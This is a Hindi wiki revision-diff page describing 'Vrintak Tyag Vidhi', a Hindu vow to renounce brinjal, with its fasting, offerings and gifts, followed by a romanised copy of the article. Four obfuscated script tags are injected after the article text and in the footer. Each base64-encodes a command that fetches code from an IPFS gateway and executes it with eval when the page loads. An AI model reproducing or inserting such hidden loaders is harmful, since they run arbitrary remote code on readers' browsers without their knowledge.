Difference between revisions of "वृन्ताक त्याग विधि"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
m (Text replace - ")</ref" to "</ref")
 
(5 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*वृन्ताक त्याग विधि व्रत के द्वारा जीवन भर या एक वर्ष या 6 [[मास|मासों]] तक या 3 मासों तक [[वृन्ताक फल]] का त्याग करना पड़ता है।  
 
*वृन्ताक त्याग विधि व्रत के द्वारा जीवन भर या एक वर्ष या 6 [[मास|मासों]] तक या 3 मासों तक [[वृन्ताक फल]] का त्याग करना पड़ता है।  
 
*एक रात्रि भर [[भरणी]] या मघा [[नक्षत्र]] में उपवास करना होता है।
 
*एक रात्रि भर [[भरणी]] या मघा [[नक्षत्र]] में उपवास करना होता है।
*एक वेदी पर [[यमराज|यम]], [[काल]], [[चित्रगुप्त]], [[मृत्यु]] एवं [[प्रजापति]] का आवाहन किया जाता है और [[गंध]] आदि पूजा की जाती है।
+
*एक वेदी पर [[यमराज|यम]], [[काल]], [[चित्रगुप्त देवता|चित्रगुप्त]], मृत्यु एवं [[प्रजापति]] का आवाहन किया जाता है और गंध आदि पूजा की जाती है।
*[[तिल]] एवं [[घी]] से स्वाहा के साथ यम, [[नील]], [[नीलकंठ महादेव|नीलकण्ठ]], [[यमराज]], [[चित्रगुप्त]], [[वैवस्वत]] के लिए होम किया जाता है।
+
*[[तिल]] एवं [[घी]] से स्वाहा के साथ यम, [[नील]], [[नीलकंठ महादेव|नीलकण्ठ]], [[यमराज]], [[चित्रगुप्त देवता|चित्रगुप्त]], [[वैवस्वत]] के लिए होम किया जाता है।
*वृन्ताक त्याग विधि में 108 आहुतियाँ; सोने का बना एक वृन्ताक, काली [[गाय]] एक [[बैल]], [[अँगूठी|अँगूठियाँ]], [[कर्णफूल]], [[छ़त्र]], चप्पल, काले वस्त्र का जोड़ा एवं काले कम्बल का दान; [[ब्राह्मण|ब्राह्मणों]] को भोजन कराना चाहिए।
+
*वृन्ताक त्याग विधि में 108 आहुतियाँ; सोने का बना एक वृन्ताक, काली [[गाय]] एक बैल, अँगूठियाँ, कर्णफूल, छ़त्र, चप्पल, काले वस्त्र का जोड़ा एवं काले कम्बल का दान देना चाहिए।
 +
*[[ब्राह्मण|ब्राह्मणों]] को भोजन कराना चाहिए।
 
*ऐसी मान्यता है कि जो वृन्ताक को जीवन भर छोड़ देता है वह विष्णुलोक जाता है।
 
*ऐसी मान्यता है कि जो वृन्ताक को जीवन भर छोड़ देता है वह विष्णुलोक जाता है।
 
*जो ऐसा वर्षभर या केवल एक मास ही करता है, वह नरक में नहीं पड़ता है।
 
*जो ऐसा वर्षभर या केवल एक मास ही करता है, वह नरक में नहीं पड़ता है।
*यह प्रकीर्णक व्रत है। <ref>हेमाद्रि (व्रतखण्ड2, 909-910, भविष्योत्तरपुराण से उद्धरण)</ref>  
+
*यह प्रकीर्णक व्रत है।<ref>हेमाद्रि (व्रतखण्ड2, 909-910, भविष्योत्तरपुराण से उद्धरण</ref>  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:58, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • vrintak tyag vidhi vrat ke dvara jivan bhar ya ek varsh ya 6 masoan tak ya 3 masoan tak vrintak phal ka tyag karana p data hai.
  • ek ratri bhar bharani ya magha nakshatr mean upavas karana hota hai.
  • ek vedi par yam, kal, chitragupt, mrityu evan prajapati ka avahan kiya jata hai aur gandh adi pooja ki jati hai.
  • til evan ghi se svaha ke sath yam, nil, nilakanth, yamaraj, chitragupt, vaivasvat ke lie hom kiya jata hai.
  • vrintak tyag vidhi mean 108 ahutiyaan; sone ka bana ek vrintak, kali gay ek bail, aangoothiyaan, karnaphool, chh़tr, chappal, kale vastr ka jo da evan kale kambal ka dan dena chahie.
  • brahmanoan ko bhojan karana chahie.
  • aisi manyata hai ki jo vrintak ko jivan bhar chho d deta hai vah vishnulok jata hai.
  • jo aisa varshabhar ya keval ek mas hi karata hai, vah narak mean nahian p data hai.
  • yah prakirnak vrat hai.[1]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vratakhand2, 909-910, bhavishyottarapuran se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>